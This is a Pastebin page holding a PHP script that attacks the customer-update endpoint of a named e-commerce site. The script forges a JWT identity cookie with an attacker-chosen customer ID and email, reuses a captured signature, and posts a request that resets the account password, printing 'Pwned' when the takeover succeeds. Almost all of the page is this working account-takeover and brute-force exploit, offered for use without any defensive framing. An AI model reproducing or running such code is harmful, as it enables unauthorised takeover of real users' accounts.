Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- localhost/wadi.php?id= <[brute Here]
- <?
- $email = ""; # Here Email
- $id = $_GET['id'];
- # Json Web Token
- $decrypt = '
- {
- "username": "'.$email.'",
- "roles": [
- "ROLE_CUSTOMER"
- ],
- "customerId": '.$id.',
- "exp": "1495828867",
- "iat": "1494619267"
- }
- ';
- $encrypt = base64_encode($decrypt);
- /////////////////////////////////////////////////////
- /* Here Request Brute Force */
- $wadi = curl_init();
- curl_setopt($wadi, CURLOPT_URL, "https://my.wadi.com/customers/update/");
- curl_setopt($wadi, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($wadi, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($wadi, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($wadi, CURLOPT_HTTPHEADER, array(
- 'Host: my.wadi.com',
- 'Content-Type: application/json;charset=utf-8',
- 'Cookie: identity=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXUyJ9.'.$encrypt.'.W1tS_wnX6j9q2bcWt9wiTpSOCFVzZCs08ySeI63NclCSYjCwYd_GrQw3gPYYz3A2e9HUUJO5_0dVPB-clyPkV6jLxQ4TB2zj7zkBm3x1781XkN2m-ahShGaliw4P661U2akrOXi6ir7Z0Ienr0kcpJi7UAuUrnGgHwutAgEe8aDPrG8q74VQ9mzJCoGDzaBqhvsCrhRfVem4tyWrzUYU6rbXtYNpRSkUtalG4ydnXLtYU6IaiCc8vYFNktms1FCnHeEI8tppqEHG6b8Zm8d4SUA_E0XxGB0OD1dRXjNdurcsWg3bib1eHa9SGzEWJ494O3NHYN2NOuNQGo5Y9ioZxQ;',
- 'Connection: keep-alive'
- ));
- curl_setopt($wadi, CURLOPT_POSTFIELDS, '{"password":"eliteroot"}');
- curl_setopt($wadi, CURLOPT_HEADER, 1);
- curl_setopt($wadi, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- $source = curl_exec($wadi);
- if(eregi('"email":"'.$email.'"', $source))
- {
- echo "Pwned";
- }
- else
- {
- echo "Failed";
- }
- curl_close($wadi);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
